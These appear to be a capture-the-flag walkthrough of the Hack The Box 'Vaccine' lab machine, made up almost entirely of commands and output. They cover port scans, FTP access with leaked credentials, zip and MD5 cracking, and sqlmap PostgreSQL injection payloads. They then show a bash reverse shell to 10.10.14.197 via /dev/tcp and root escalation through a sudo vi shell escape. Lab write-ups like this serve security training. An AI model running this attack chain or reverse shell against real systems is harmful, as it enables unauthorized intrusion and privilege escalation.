Vaccine

$ nmap -p- -A -T4 10.10.10.46
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ nikto -h 10.10.10.46
+ Server: Apache/2.4.41 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7865 requests: 2 error(s) and 6 item(s) reported on remote host
$ dirb http://10.10.10.46
+ http://10.10.10.46/index.php (CODE:200|SIZE:2312)                                                                                                                               
+ http://10.10.10.46/server-status (CODE:403|SIZE:276)
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass
$ ftp ftpuser@10.10.10.10.46
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
$ zip2john backup.zip > hash.txt
$ john hash.txt --fork=4 -w /usr/share/wordlists/rockyou.txt
741852963        (backup.zip)
$ less index.php 
$_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") 

$ hashcat -m 0 -a 0 md5hash.txt /usr/share/wordlists/rockyou.txt --show
2cb42f8734ea607eefed3b70af13bbd3:qwerty789
http://10.10.10.46/dashboard.php?search=a
SQL injection vulnerabilities
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vigasgqiigqpv09s8imhqkp5i9"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=a' AND (SELECT (CASE WHEN (1032=1032) THEN NULL ELSE CAST((CHR(115)||CHR(87)||CHR(122)||CHR(110)) AS NUMERIC) END)) IS NULL-- KWNP

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=a' AND 2998=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2998=2998) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(106)||CHR(113)) AS NUMERIC)-- xtnq

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=a' AND 5040=(SELECT 5040 FROM PG_SLEEP(5))-- ulVr
---
[13:16:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
$nc -lvnp 4444
tried this may many times:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vigasgqiigqpv09s8imhqkp5i9" --os-shell
os-shell
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
[13:20:48] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.197/4444 0>&1'
do you want to retrieve the command standard output? [Y/n/a] 
kali@kali:~/0.htb/Starting_Point/Vaccine46$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.46] 56178
bash: cannot set terminal process group (6064): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ 
postgres@vaccine:/var/lib/postgresql/11/main$ SHELL=/bin/bash script -q /dev/null
<gresql/11/main$ SHELL=/bin/bash script -q /dev/null
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html  
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png         dashboard.js   index.php    style.css
dashboard.css  dashboard.php  license.txt
postgres@vaccine:/var/www/html$ cat dashboard.php

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

postgres@vaccine:/var/www/html$ python3 -c "import pty; pty.spawn('/bin/bash')"
<ml$ python3 -c "import pty; pty.spawn('/bin/bash')"
postgres@vaccine:/var/www/html$ 
postgres@vaccine:/var/www/html$ sudo -l
sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:/var/www/html$ 
postgres@vaccine:/var/www/html$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash
root@vaccine:/var/www/html# 

root@vaccine:~# cat root.txt
cat root.txt
dd6e058e814260bc70e9bbdef2715849
root@vaccine:~# 




Navigation